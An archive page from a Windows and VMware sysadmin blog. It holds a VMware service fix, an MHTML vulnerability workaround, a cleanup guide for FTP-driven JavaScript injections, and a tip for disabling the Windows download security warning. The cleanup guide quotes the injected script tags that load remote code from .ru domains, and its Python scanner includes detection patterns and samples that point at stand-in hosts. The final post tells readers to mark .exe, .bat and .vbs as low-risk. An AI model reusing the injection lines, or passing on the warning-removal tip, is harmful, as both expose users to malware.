Archive for the ‘Security’ Category

VCS vSphere – Check new notifications stuck on Queued – VMware vCenter Update Manager Check Notification

February 7th, 2011 35 comments

So if you have a bunch of queued items in your VMware vSphere Client Recent Tasks that say “Check new notifications” initiated by “VMware vCenter Update Manager Check Notification”, there is an easy fix. Here’s what it looks like:

To fix, all you have to do is restart the VMware vCenter Update Manager Service on your VCS server. See below:

Alternatively, from a command prompt on the VCS server, run “net stop vmware-ufad-vci” followed by “net start vmware-ufad-vci”. Let me know if this works out for you! 🙂

Categories: ESX, How To, Randomness, Security, VIClient, VMware

Microsoft KB2501696 MHTML Vulnerability Test and Quick Fix Workaround – Group Policy Friendly

January 31st, 2011 5 comments

All Microsoft platforms since Windows XP SP3 are affected by this pretty nasty vulnerability. KB2501696 explains that the bug lies in the way Windows handles MHTML documents. Internet Explorer itself is not at fault here; this is a Windows bug. IE, however, will be the attack vector for anyone wanting to take advantage of this flaw (and they will).

First off, to see if you are affected, follow this test link using Internet Explorer. If you get a popup box saying you are affected, then you should apply this fix right away. Also, make sure you are using Internet Explorer since most other browsers do not use the Windows MHTML libraries.

Microsoft gives a lame “FixIt” MSI that is not very GPO friendly. So I went out and wrote my own fix for it. It’s a batch script that you can run locally on a single computer or deploy as a “startup/shutdown script” in Group Policy without any edits needed. It is also compatible with both x86 and x64 machines. Copy the following into your favorite text editor and give it a “.cmd” extension.

You can also click here to download it. Comment below and let me know how this works for you or if you have any other questions/comments/improvements!

Thanks!

Categories: How To, Malware, MHTML, Security, Vulnerability

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory, then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only, and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing the FTP credentials of websites you have access to. The attackers then run an automated script that logs in to your site over FTP and appends a link to their malicious code to your PHP and JS files.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update Java – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .ru domains are involved, which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.
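As an added example (my own Python code, not the PHP removal script linked above), here is a scanner with the same search-only and search-and-fix modes that keys on the structure of the injection quoted above (Template.js pulled from an outside host, the 32-hex-digit comment marker, and the split 'sc'+'ript' trick) rather than on the .ru TLD, which is the generalisation the 8/26 update asks about. The host names and hex marker in the samples are constructed, not real indicators.

```python
import os, re, shutil, tempfile

# Signatures derived from the injected code quoted in the post: the script tag
# loading Template.js from an outside host (optionally followed by the 32-hex
# comment marker), and the JS variant that splits "script" with '+' so a plain
# grep for "<script" misses it. Neither signature depends on the .ru TLD.
HTML_SIG = re.compile(r'<script type="text/javascript" src="https?://[^"]+/Template\.js">'
                      r'</script>\s*(?:<!--[0-9a-f]{32}-->)?', re.I)
JS_SIG = re.compile(r"document\.write\('<sc'\+'ript[^']*?src=\"https?://[^\"]+/Template\.js\">"
                    r"</scri'\+'pt>'\);", re.I)

def clean_text(text):
    """Strip every injection from text; return (cleaned_text, number_removed)."""
    cleaned, n_html = HTML_SIG.subn("", text)
    cleaned, n_js = JS_SIG.subn("", cleaned)
    return cleaned, n_html + n_js

def scan_tree(root, exts=(".php", ".html", ".htm", ".js"), fix=False):
    """Recurse under root -> {path: injections}; fix=True backs up to .bak and rewrites."""
    report = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                cleaned, count = clean_text(fh.read())
            if count == 0:
                continue
            report[path] = count
            if fix:
                shutil.copy2(path, path + ".bak")  # backup before touching the file
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return report

# Constructed samples (not real infected files) mirroring the two patterns.
SAMPLE_JS = ("function x(){}\ndocument.write('<sc'+'ript type=\"text/javascript\" "
             "src=\"http://example.invalid/Template.js\"></scri'+'pt>');")
SAMPLE_PHP = ('<?php echo "hi"; ?>\n<script type="text/javascript" src="http://evil.'
              'example.invalid/Template.js"></script>\n<!--0123456789abcdef0123456789abcdef-->')
def demo():
    """Write the samples to a temp dir, run search-only, then search-and-fix."""
    root = tempfile.mkdtemp()
    for name, body in (("app.js", SAMPLE_JS), ("index.php", SAMPLE_PHP), ("ok.html", "<p>ok</p>")):
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    base = lambda rep: sorted(os.path.basename(p) for p in rep)
    found = base(scan_tree(root))            # search only: files untouched
    fixed = base(scan_tree(root, fix=True))  # backup + rewrite
    after = base(scan_tree(root))            # nothing should remain
    return found, fixed, after, sorted(n for n in os.listdir(root) if n.endswith(".bak"))
```

Point scan_tree at your document root with fix=False first and review the report before rerunning with fix=True; the .bak copies are what you restore from if a match turns out to be legitimate.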

Categories: Malware, PHP, Randomness, Security

Remove the Open File Security Warning in XP, Vista, and Windows 7

February 20th, 2009 34 comments

Every single time you download a program and try to run it, that stupid pop-up comes up and adds a whole extra click. The pop-up looks like this:

"Open File - Security Warning" - "The publisher could not be verified. Are you sure you want to run this software?" YES I'M SURE DAMNIT!

You can remove this in any Microsoft OS that is XP or later with the same steps. How do I remove this you ask? Like so:

1. Click Start, Run (or Windows+R) and type gpedit.msc
2. Navigate to User Configuration -> Administrative Templates -> Windows Components -> Attachment Manager, then double-click “Inclusion list for low file types” in the right pane

3. Select Enabled and enter the file extensions you want to allow, each with its leading period and separated by semicolons, for example:

.exe;.msi;.cmd;.bat;.vbs;
Hit OK, exit out of your Group Policy window, and run your newly downloaded spyware-infested program, free of the annoying “security” pop-up!